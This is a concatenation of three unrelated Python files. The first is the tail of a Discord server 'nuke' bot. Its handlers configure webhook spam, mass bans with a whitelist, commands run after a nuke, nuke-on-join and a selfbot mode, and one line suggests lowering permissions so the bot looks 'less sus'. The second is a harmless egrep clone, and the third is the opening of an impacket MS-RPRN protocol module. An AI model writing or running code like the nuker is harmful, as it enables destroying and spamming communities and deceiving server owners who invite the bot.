await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from usernames.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam usernames list', settings['webhook_spam']['usernames'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
elif args[0] == 'pfp_urls' or args[0] == 'pfp_url' or args[0] == 'pfp':
if args[1] == 'add':
if len(args) > 1 and args[2].lower() == 'none':
settings['webhook_spam']['pfp_urls'].append(None)
await log(ctx, f'No pfp item has been added')
elif len(args) > 1 and args[2].startswith(('https://', 'http://')):
settings['webhook_spam']['pfp_urls'].append(args[2])
await log(ctx, f'URL added.')
else:
await log(ctx, f'Please enter an **image URL**. Note: the link must start with http(s) protocals. Or enter `none` for no pfp.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['pfp_urls'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['pfp_urls'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from pfp_urls.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam pfp_urls list', settings['webhook_spam']['pfp_urls'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
elif args[0] == 'contents' or args[0] == 'content':
if args[1] == 'add':
if len(args) > 1 and (0 < len(text := ' '.join(args[2:])) <= 2000):
settings['webhook_spam']['contents'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 2000 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['contents'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['contents'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from contents.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam contents list', settings['webhook_spam']['contents'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
else:
await log(ctx, f'Unknown type: `{args[0]}`')
elif command == 'after':
if args is None:
status_list = []
features_list = []
features_list.append('after')
if len(settings['after']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'After commands',
description = f'All the commands in this list will run after `{settings["command_prefix"]}nuke`. It can be disabled by adding "false" after the nuke command: `{settings["command_prefix"]}nuke false`.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`after add <command>` - add command to the back of the command list\n\n`after remove <line number> [line number] [line...` - remove line(s) in the command list\n\n`after insert <line number> <command>` - insert command after the given line. Note: use `insert 0 <command>` to insert the command to the first line\n\n`after list [page number]` - list commands that are in the command list', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'add':
if len(args) > 1:
text = ' '.join(args[1:])
settings['after'].append(text)
await log(ctx, f'Command added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter the command you want to add after line `{len(settings["after"])}`.')
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['after'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['after'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter the line(s) that you want to remove from after commands.')
elif args[0] == 'insert':
if len(args) > 2 and args[1].isdigit():
if not (0 <= (index := int(args[1])) <= len(settings['after'])) or len(settings['after']) == 0:
await log(ctx, f'Line `{args[1]}` doesn\'t exist.')
return
settings['after'].insert(index, ' '.join(args[2:]))
await log(ctx, f'Added command after line `{args[1]}`.')
else:
await log(ctx, 'Insert usage: `after insert <after line #> <command...>`')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'after command(s) list', settings['after'])
else:
await log(ctx, f'Unknown operation: `{args[0]}`')
elif command == 'bot_status':
if args is None:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bot_status',
description = f'Whenever the bot boot up the status will be set to a given status.\n\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value=f'{settings["bot_status"]}', inline=True)
embed.add_field(name='Features', value='bot_status', inline=True)
embed.add_field(name='Usage', value=f'`bot_status <on start status>` - set the on start status. Available on start status are `online`, `offline`, `idle`, and `dnd` or `do_not_disturb`. By default it is set to `offline`.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if (args := args.lower()) in ['online', 'offline', 'idle', 'dnd', 'do_not_disturb']:
settings['bot_status'] = args
await log(ctx, 'On bot start status has been set to `{args}`.')
else:
await log(ctx, 'Available on start status are `online`, `offline`, `idle`, and `dnd` or `do_not_disturb`.')
elif command == 'bot_permission':
if args is None:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bot_permission',
description = f'If you are using a selfbot, then you don\'t have to do anything to this section. This bot_permission section is for normal bot invite URL that will ask the person inviting it for permission/roles (ex. admin, server manager). The default is set to 2146958847, which asks for all permissions. If you want to make the bot less sus, you can remove the permissions that are not needed.\n\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Value', value=f'{settings["bot_permission"]}', inline=True)
embed.add_field(name='Features', value='bot_permission', inline=True)
embed.add_field(name='Usage', value=f'`bot_permission <value>` - set permissions value to the given number. Use this [permission calculator](https://wizbot.cc/permissions-calculator/?v=0) to help you calculate the values. Note: if you are going to use that calculator all you need is to copy the number that is display at the top, and then use this command.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if args.isdigit() and 0 <= int(args) <= 2146958847:
settings['bot_permission'] = args
await log(ctx, 'Bot permission has been set to `{args}`.')
else:
await log(ctx, 'Please enter a value between 0 and 2146958847.')
elif command == 'save':
def check(message: discord.Message):
return message.author.id == ctx.message.author.id
if args is None:
await log(ctx, f'You need to name the file. Use `{settings["command_prefix"]}save <file name>`.')
return
parent_dir = os.path.join(Path().absolute().__str__(), 'data')
config_path = os.path.join(parent_dir, args.translate(bad_filename_map))
if os.path.isfile(config_path):
await log(ctx, f'Configuration file named {args} already exist. Do you want to overwrite it? [Y/n]')
while True:
try:
msg = (await client.wait_for('message', check=check, timeout=10)).content.lower()
if msg == 'y' or msg == 'yes':
with open(config_path, 'w') as f:
f.write(json.dumps(settings))
break
elif msg == 'n' or msg == 'no':
await log(ctx, f'Saving cancelled.')
return
await log(ctx, f'Yes or no.')
except (asyncio.exceptions.TimeoutError, discord.ext.commands.errors.CommandInvokeError):
await log(ctx, "Took too long to answer.")
return
else:
if not os.path.isdir(parent_dir):
os.mkdir(parent_dir)
with open(config_path, 'w+') as f:
f.write(json.dumps(settings))
global settings_copy
settings_copy = deepcopy(settings)
await log(ctx, 'Finished saving.')
elif command == 'verbose':
if args is None:
status_list = []
features_list = []
# hard coding this because I don't think there's a better way to set the values.
features_list.append('Log response from requests')
if want_log_request:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log messages in console')
if want_log_console:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log messages in discord chat')
if want_log_message:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log any errors')
if want_log_errors:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'verbose',
description = f'Verbose is the log level. Meaning that if you don\'t want any one of the logs to spam rate limiting errors or whatever errors that the bot is going to throw at you, you can disable them to prevent some lag.\n\nCurrent verbose value: `{str(settings["verbose"])}`\n:white_check_mark: = Enabled\n:x: = Disabled\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Logs', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`verbose <value>` - enable and disable the logs. Subtracting the values below from the current verbose to disable the log(s) you want, and adding the values will enable them. For example if I want to disable "Log any error" I will subtract 8 from 15 to get 7 and use 7 as the new verbose value to set, if I want to disable more like "Log response from request" I will substract 1 from 7 to get 6. To enable them back just add 8 and 1 to the current verbose value.\n\n`1` - Log response from requests\n`2` - Log messages in console\n`4`- Log messages in discord chat\n`8` - Log any errors.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if args.isdigit() and 0 <= (args := int(args)) <= 15:
settings['verbose'] = args
updateVerbose()
await log(ctx, 'On bot start status has been set to `{args}`.')
else:
await log(ctx, 'You can only enter a positve integer between or on 0 and 15.')
elif command == 'ban_whitelist':
if args is None:
status_list = []
features_list = []
features_list.append('ban_whitelist')
if len(settings['ban_whitelist']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Ban whitelist',
description = f'Ban whitelist is used for telling `{settings["command_prefix"]}banAll` and `{settings["command_prefix"]}nuke` to not ban the users in the list. You can put discord tag or discord ID in the list, but it is recommended to use discord ID because in the pass there has some uncheckable discord tags.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`ban_whitelist add <command>` - add user to the back of the command list\n\n`ban_whitelist remove <line number> [line number] [line...` - remove line(s) in the ban whitelist\n\n`ban_whitelist list [page number]` - list users that are in the ban whitelist', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'add':
if len(args) > 1:
text = ' '.join(args[1:])
settings['ban_whitelist'].append(text)
await log(ctx, f'User added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter the userID or userTag that you want to add after line `{str(len(settings["after"]))}`.')
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['ban_whitelist'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['ban_whitelist'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from usernames.')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'ban whitelist', settings['ban_whitelist'])
else:
await log(ctx, f'Unknown operation: `{args[0]}`')
elif command == 'proxies':
await log(ctx, 'This feature has been disabled for now due to unhandled slow/bad proxies.')
elif command == 'prefix' or command == 'command_prefix':
if args is None:
await log(ctx, f'Use `` {command_prefix}config command_prefix <command_prefix> ``')
else:
settings['command_prefix'] = client.command_prefix = args
await log(ctx, 'Command prefix changed.')
elif command == 'token':
if args is None:
await log(ctx, 'Usage: `token <new token>` - new token for this config. Restarting the bot will be required. Remember to save the config before restarting.')
else:
settings['token'] = args
await log(ctx, 'New token has been set.')
else:
await log(ctx, f'Unable to find the config. `{command}`')
## Additional functions ##
@commands.check(checkPerm)
@client.command(name='checkRolePermissions', aliases=['check', 'crp'])
async def checkRolePermissions(ctx, name, n='1'):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
member_ = containing(selected_server.members, nameIdHandler(name))
if member_ is None:
await log(ctx, f'Unable to found {name}.')
return
value = member_.guild_permissions.value
temp = sorted(member_.guild_permissions, key=lambda p: p)
master_list = ''
item_length = 31
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
for i in range(init_item, final_item, 1):
item, has_perm = temp[i]
if has_perm:
master_list += ':white_check_mark: '
else:
master_list += ':x: '
master_list += item.replace('_', ' ').capitalize() + '\n'
# if not isDM(ctx) and ctx.guild.id == selected_server.id and 1 << 11 & selected_server.me.guild_permissions.value == 0:
# consoleLog('\n%s*Check role permissions*\n%sPermission value -> %s%d : 2147483647\n%s %s%d/%d' % (Fore.CYAN, Fore.RESET, Fore.YELLOW, value, master_list.replace(':white_check_mark:', f'{Fore.GREEN}+').replace(':x:', f'{Fore.RED}-'), Fore.YELLOW, n+1, ceil(item_length / per_page)), True)
# else:
try:
embed = discord.Embed(
title = 'User permissions',
description = f'Encoded value: {str(value)} : 2147483647',
color = discord.Color.red()
)
embed.add_field(name='Permissions', value=master_list, inline=True)
embed.set_footer(text=f'{str(n+1)}/{str(ceil(item_length / per_page))}')
await ctx.send(embed=embed)
except:
await ctx.send('```diff\n%s %d/%d```' % (master_list.replace(':white_check_mark:', '+').replace(':x:', '-'), n+1, ceil(item_length / per_page)))
@commands.check(checkPerm)
@client.command(name='serverIcon', aliases=['si', 'changeServerIcon'])
async def serverIcon(ctx, path=None):
if not await hasTarget(ctx):
return
if path is None:
await selected_server.edit(icon=None)
await log(ctx, f'Successfully removed the server icon from `{selected_server.name}`.')
elif path.startswith(('https://', 'http://', 'ftp://', 'ftps://')): # Link EX: https://www.example.com/aaa.png
try:
await selected_server.edit(icon=BytesIO(requests.get(path).content).read())
consoleLog('Successfully changed the current server icon.')
except:
consoleLog(f'Unable to change the server icon to "{path}".')
elif path[0] == '<': # EX: <a:triggeredd:627060014431076352>
path = path.split(':')
try:
if path[0] == '<a': # Animated
await selected_server.edit(icon=discord.File(BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{path[2][:-1]}.gif?v=1').content).read()))
else:
await selected_server.edit(icon=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{path[2][:-1]}.png?v=1').content).read())
await log(ctx, 'Successfully changed the server icon.')
except:
raise
elif os.path.isfile(path): # File EX: C:\Users\user\Desktop\something.jpg or EX: .\icon\something.jpg
with open(path, 'rb') as data:
await selected_server.edit(icon=data.read())
await log(ctx, 'Successfully changed the server icon.')
else:
try:
unicode_number = str(ord(path)) + ', '
except:
unicode_number = ''
unicode_string = path.encode('utf8')
sys.stdout.buffer.write(f'"{path}" is not supported to be set as a server icon.'.encode('utf8'))
consoleLog(unicode_number)
await log(ctx, f'{path} is not supported to be set as a server icon.')
await log(ctx, f'Character\'s bytes: {unicode_number}{unicode_string}')
@commands.check(checkPerm)
@client.command(name='serverName', aliases=['sn', 'changeServerName'])
async def serverName(ctx, *, name):
if not await hasTarget(ctx):
return
try:
await selected_server.edit(name=name)
await log(ctx, f'Server name has been changed to `{name}`.')
except discord.errors.Forbidden:
await log(ctx, 'Unable to change the server name.')
raise
except:
raise
@commands.check(checkPerm)
@client.command(name='purge', aliases=['clear'])
async def purge(ctx, n=None):
if not await hasTarget(ctx):
return
consoleLog('Purging messages...', True)
if n is not None and (not n.isdigit() or (n := int(n)) < 1):
await log(ctx, 'Please enter a positive integer.')
return
to_delete_messages = await ctx.channel.history(limit=n).flatten()
consoleLog('Due to discord ratelimitings purging messages cannot be run in a fast pace. After every message the bot will timeout for 3 seconds', True)
delay_time = 0
for message in to_delete_messages:
while True:
await asyncio.sleep(delay_time)
r = requests.delete(f'https://discord.com/api/v8/channels/{ctx.channel.id}/messages/{message.id}', headers=headers)
if r.status_code == 429:
delay_time = r.json()['retry_after']
consoleLog(f'ratelimiting reached. Purging delay has been set to -> {str(delay_time)} seconds')
else:
break
@commands.check(checkPerm)
@client.command(name='leave')
async def leave(ctx, name=None):
if name is None:
if not await hasTarget(ctx):
return
await selected_server.leave()
else:
server = containing(client.guilds, name)
if server is None:
await log(ctx, f'Unable to find server {name}.')
return
await server.leave()
if not isDM(ctx) and ctx.guild.id == selected_server.id:
consoleLog(f'{Fore.BLUE}Goodbye {selected_server.name}! {Fore.YELLOW}-> {Fore.GREEN}Left {Fore.RESET}{selected_server.name}.', True)
else:
await log(ctx, f'Goodbye {selected_server.name}! -> Left {selected_server.name}.')
@commands.check(checkPerm)
@client.command(name='leaveAll')
async def leaveAll(ctx):
await log(ctx, 'Leaving all servers. Note: You won\'t be able to message me after I left all servers.')
for server in client.guilds:
await server.leave()
consoleLog('Left all servers.', True)
@commands.check(checkPerm)
@client.command(name='joinNuke', aliases=['nukeOnJoin', 'join nuke'])
async def joinNuke(ctx, true_or_false):
global saved_ctx, nuke_on_join
if true_or_false.lower() == 'true':
saved_ctx = ctx
nuke_on_join = True
await log(ctx, 'Nuke on bot joining a new server has been turned on.')
elif true_or_false.lower() == 'false':
nuke_on_join = False
await log(ctx, 'Nuke on bot joining a new server has been turned off.')
else:
await log(ctx, 'Invalid flag: true or false. Note: true or false is not case sensitive.')
@commands.check(checkPerm)
@client.command(name='changeStatus', aliases=['cs'])
async def changeStatus(ctx, status):
if status == 'offline':
await client.change_presence(status=discord.Status.offline)
elif status == 'invisible':
await client.change_presence(status=discord.Status.invisible)
elif status == 'online':
await client.change_presence(status=discord.Status.online)
elif status == 'idle':
await client.change_presence(status=discord.Status.idle)
elif status == 'dnd' or status == 'do_not_disturb':
await client.change_presence(status=discord.Status.do_not_disturb)
@commands.check(checkPerm)
@client.command(name='link', aliases=['l'])
async def link(ctx):
if not is_selfbot:
await ctx.channel.send(f'https://discord.com/api/oauth2/authorize?client_id={client.user.id}&permissions={settings["bot_permission"]}&scope=bot')
else:
await log(ctx, f'This account is not a bot :). You can join servers with invite codes.')
@commands.check(checkPerm)
@client.command(name='autoNick', aliases=['an'])
async def autoNick(ctx):
if not await hasTarget(ctx):
return
global auto_nick
if not auto_nick:
consoleLog(f'{Fore.CYAN}Auto nickname is on.', True)
auto_nick = True
while auto_nick:
# payload = {'nick': ''.join(choice(alphanum) for _ in range(10))}
# q.put((requests.patch, f'https://discord.com/api/v8/guilds/{selected_server.id}/members/%40me/nick', headers, payload))
await selected_server.me.edit(nick=''.join(choices(alphanum, k=10)))
else:
consoleLog(f'{Fore.BLUE}Auto nickname is off.', True)
auto_nick = False
@commands.check(checkPerm)
@client.command(name='autoStatus', aliases=['as'])
async def autoStatus(ctx):
global auto_status
if not auto_status:
consoleLog(f'{Fore.CYAN}Auto status is on.', True)
auto_status = True
while auto_status:
await client.change_presence(status=discord.Status.online)
await asyncio.sleep(random() + 0.3) # Theres a rate limit for changing status every minute or 5 minutes i havent figure out the exact number but ill stay with this sleep commmand
await client.change_presence(status=discord.Status.offline)
await asyncio.sleep(random() + 0.3)
else:
consoleLog(f'{Fore.BLUE}Auto status is off.', True)
auto_status = False
@commands.check(checkPerm)
@client.command(name='off', aliases=['logout', 'logoff', 'shutdown', 'stop'])
async def off(ctx):
### Discord takes too long to realize if the bot is offline people might get confused about the not turning off the bot vs discord takes time to update
await changeStatus(None, 'offline')
await client.logout()
###### Closing handler ######
###### https://github.com/aio-libs/aiohttp/issues/4324
from functools import wraps
from asyncio.proactor_events import _ProactorBasePipeTransport
def silence_event_loop_closed(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except RuntimeError as e:
if str(e) != 'Event loop is closed':
raise
return wrapper
_ProactorBasePipeTransport.__del__ = silence_event_loop_closed(_ProactorBasePipeTransport.__del__)
# PrivilegedIntents fixed fail :')
# async def login():
# global client
# try:
# await client.start(settings['token'], bot=not is_selfbot)
# except discord.PrivilegedIntentsRequired:
# print('PrivilegedIntentsRequired: This field is required to request for a list of members in the discord server that the bot is connected to. Watch https://youtu.be/DXnEFoHwL1A?t=44 to see how to turn on the required field.')
# # exit()
# client._connection = client._get_state(
# intents=client.intents.default()
# ) # reset intents to default
# input('lol')
# await login()
# except Exception as e:
# print(e)
# finally:
# sys.stdout.write('Exiting... \n')
# asyncio.run(login()) # if login failed because of the privileged intents then ask if user wants to turn off the intents
try:
client.run(settings['token'], bot=not is_selfbot)
except discord.PrivilegedIntentsRequired:
print('PrivilegedIntentsRequired: This field is required to request for a list of members in the discord server that the bot is connected to. Watch https://youtu.be/DXnEFoHwL1A?t=44 to see how to turn on the required field.')
exit()
except Exception as e:
print(e)
finally:
sys.stdout.write('Exiting... \n')
|
import re,argparse,sys,os
from argparse import RawDescriptionHelpFormatter
from colorprint.printer import uprint
from colorprint.unicolor import FOREGROUND_GREEN,FOREGROUND_RED,FOREGROUND_PINK
'''
--color 用颜色显示出来
-v 条件取反
-i 忽略大小写
-c 统计匹配的行数
-q 静默,无任何输出,一般用于检测。如果$?是0说明有匹配,否则没有
-n 显示出匹配结果所在的行号
'''
# usage = "Usage: grep [OPTION]... PATTERN [FILE]..."
usage = None
description = '''Search for PATTERN in each FILE or standard input.
PATTERN is, by default, a basic regular expression (BRE).
Example: egrep -i 'hello world' menu.h main.c'''
epilog ='''This egrep is an imitation of egrep in linux, I try my best to do it but as you
can see, it's not completed.
When FILE is -, read standard input. With no FILE, read . if a command-line
-r is given, - otherwise. If fewer than two FILEs are given, assume -h.
Exit status is 0 if any line is selected, 1 otherwise;
if any error occurs and -q is not given, the exit status is 2.
Report bugs to: <EMAIL>
my github page: <http://www.gnu.org/software/grep/>
'''
prog = "egrep"
parser = argparse.ArgumentParser(prog=prog,
usage=usage,
description=description,
epilog=epilog,
formatter_class=RawDescriptionHelpFormatter)
parser.add_argument("-v","--invert-match",
dest="invert_match",
action="store_true", #store,store_const,store_true/store_false,append,append_const,version
help="select non-matching lines",
default=False,)
parser.add_argument("-i","--ignore-case",
dest="ignorec_case",
action="store_true", #store,store_const,store_true/store_false,append,append_const,version
help="ignore case distinctions",
default=False,)
parser.add_argument("-n","--line-number",
dest="line_number",
action="store_true", #store,store_const,store_true/store_false,append,append_const,version
help="print line number with output lines",
default=False,)
parser.add_argument("-c","--count",
dest="count",
action="store_true", #store,store_const,store_true/store_false,append,append_const,version
help="print only a count of matching lines per FILE",
default=False,)
parser.add_argument("-o","--only-matching",
dest="only_matching",
action="store_true", #store,store_const,store_true/store_false,append,append_const,version
help="show only the part of a line matching PATTERN",
default=False,)
# parser.add_argument("-v","--nn",
# dest="invert_match",
# action="store_true", #store,store_const,store_true/store_false,append,append_const,version
# type = str,
# default="",
# nargs=1)
parser.add_argument('PATTERN',
metavar='PATTERN',
type=str,
help='By default, a basic regular expression (BRE).')
parser.add_argument('FILE',
metavar='FILE',
type=str,
nargs='+',
help='place markdown path')
args = parser.parse_args()
ignore_case = args.ignorec_case
pattern = args.PATTERN
invert_match = args.invert_match
line_number = args.line_number
only_matching = args.only_matching
count = args.count
files = args.FILE
if ignore_case:
egrex = re.compile(pattern,re.IGNORECASE)
else:
egrex = re.compile(pattern)
all_num = 0
multi_file = len(files) != 1
for file in files:
# print(file)
cur_num = 0
with open(file,"rb") as f:
for i,line in enumerate(f):
line = line.decode().strip("\n")
match = re.search(egrex,line)
if match is None and invert_match:
cur_num += 1
if not only_matching:
if not count:
if multi_file:
uprint(file, fore=FOREGROUND_PINK)
if line_number:
uprint(f"{i + 1}:", fore=FOREGROUND_GREEN)
uprint(line,end="\n")
elif match is not None and not invert_match:
cur_num += 1
if not count:
if multi_file:
uprint(file, fore=FOREGROUND_PINK)
if line_number:
uprint(f"{i + 1}:", fore=FOREGROUND_GREEN)
elif multi_file:
uprint(f":", fore=FOREGROUND_GREEN)
if only_matching:
uprint(line[match.start():match.end()],fore=FOREGROUND_RED,end="\n")
else:
uprint(line[0:match.start()])
uprint(line[match.start():match.end()],fore=FOREGROUND_RED)
uprint(line[match.end():],end="\n")
if count:
if multi_file:
uprint(file,fore=FOREGROUND_PINK)
uprint(":",fore=FOREGROUND_GREEN)
uprint(cur_num,end="\n")
all_num += cur_num
if all_num == 0:
print(f"pattern:{pattern} matches none.")
exit(1)
else:
exit(0)
|
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author: <NAME> (@agsolino)
#
# Description:
# [MS-RPRN] Interface implementation
#
# Best way to learn how to use these calls is to grab the protocol standard
# so you understand what the call does, and then read the test case located
# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
#
# Some calls have helper functions, which makes it even easier to use.
# They are located at the end of this file.
# Helper functions start with "h"<name of the call>.
# There are test cases for them too.
#
from impacket import system_errors
from impacket.dcerpc.v5.dtypes import ULONGLONG, UINT, USHORT, LPWSTR, DWORD, ULONG, NULL
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRUNION, NDRPOINTER, NDRUniConformantArray
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.uuid import uuidtup_to_bin
MSRPC_UUID_RPRN = uuidtup_to_bin(('12345678-1234-ABCD-EF00-0123456789AB', '1.0'))
class DCERPCSessionError(DCERPCException):
def __init__(self, error_string=None, error_code=None, packet=None):
DCERPCException.__init__(self, error_string, error_code, packet)
def __str__( self ):
key = self.error_code
if key in system_errors.ERROR_MESSAGES:
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
return 'RPRN SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
else:
return 'RPRN SessionError: unknown error code: 0x%x' % self.error_code
################################################################################
# CONSTANTS
################################################################################
# 2.2.1.1.7 STRING_HANDLE
STRING_HANDLE = LPWSTR
class PSTRING_HANDLE(NDRPOINTER):
referent = (
('Data', STRING_HANDLE),
)
# 2.2.3.1 Access Values
JOB_ACCESS_ADMINISTER = 0x00000010
JOB_ACCESS_READ = 0x00000020
JOB_EXECUTE = 0x00020010
JOB_READ = 0x00020020
JOB_WRITE = 0x00020010
JOB_ALL_ACCESS = 0x000F0030
PRINTER_ACCESS_ADMINISTER = 0x00000004
PRINTER_ACCESS_USE = 0x00000008
PRINTER_ACCESS_MANAGE_LIMITED = 0x00000040
PRINTER_ALL_ACCESS = 0x000F000C
PRINTER_EXECUTE = 0x00020008
PRINTER_READ = 0x00020008
PRINTER_WRITE = 0x00020008
SERVER_ACCESS_ADMINISTER = 0x00000001
SERVER_ACCESS_ENUMERATE = 0x00000002
SERVER_ALL_ACCESS = 0x000F0003
SERVER_EXECUTE = 0x00020002
SERVER_READ = 0x00020002
SERVER_WRITE = 0x00020003
SPECIFIC_RIGHTS_ALL = 0x0000FFFF
STANDARD_RIGHTS_ALL = 0x001F0000
STANDARD_RIGHTS_EXECUTE = 0x00020000
STANDARD_RIGHTS_READ = 0x00020000
STANDARD_RIGHTS_REQUIRED = 0x000F0000
STANDARD_RIGHTS_WRITE = 0x00020000
SYNCHRONIZE = 0x00100000
DELETE = 0x00010000
READ_CONTROL = 0x00020000
WRITE_DAC = 0x00040000
WRITE_OWNER = 0x00080000
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
GENERIC_EXECUTE = 0x20000000
GENERIC_ALL = 0x10000000
# 2.2.3.6.1 Printer Change Flags for Use with a Printer Handle
PRINTER_CHANGE_SET_PRINTER = 0x00000002
PRINTER_CHANGE_DELETE_PRINTER = 0x00000004
PRINTER_CHANGE_PRINTER = 0x000000FF
PRINTER_CHANGE_ADD_JOB = 0x00000100
PRINTER_CHANGE_SET_JOB = 0x00000200
PRINTER_CHANGE_DELETE_JOB = 0x00000400
PRINTER_CHANGE_WRITE_JOB = 0x00000800
PRINTER_CHANGE_JOB = 0x0000FF00
PRINTER_CHANGE_SET_PRINTER_DRIVER = 0x20000000
PRINTER_CHANGE_TIMEOUT = 0x80000000
PRINTER_CHANGE_ALL = 0x7777FFFF
PRINTER_CHANGE_ALL_2 = 0x7F77FFFF
# 2.2.3.6.2 Printer Change Flags for Use with a Server Handle
PRINTER_CHANGE_ADD_PRINTER_DRIVER = 0x10000000
PRINTER_CHANGE_DELETE_PRINTER_DRIVER = 0x40000000
PRINTER_CHANGE_PRINTER_DRIVER = 0x70000000
PRINTER_CHANGE_ADD_FORM = 0x00010000
PRINTER_CHANGE_DELETE_FORM = 0x00040000
PRINTER_CHANGE_SET_FORM = 0x00020000
PRINTER_CHANGE_FORM = 0x00070000
PRINTER_CHANGE_ADD_PORT = 0x00100000
PRINTER_CHANGE_CONFIGURE_PORT = 0x00200000
PRINTER_CHANGE_DELETE_PORT = 0x00400000
PRINTER_CHANGE_PORT = 0x00700000
PRINTER_CHANGE_ADD_PRINT_PROCESSOR = 0x01000000
PRINTER_CHANGE_DELETE_PRINT_PROCESSOR = 0x04000000
PRINTER_CHANGE_PRINT_PROCESSOR = 0x07000000
PRINTER_CHANGE_ADD_PRINTER = 0x00000001
PRINTER_CHANGE_FAILED_CONNECTION_PRINTER = 0x00000008
PRINTER_CHANGE_SERVER = 0x08000000
# 2.2.3.7 Printer Enumeration Flags
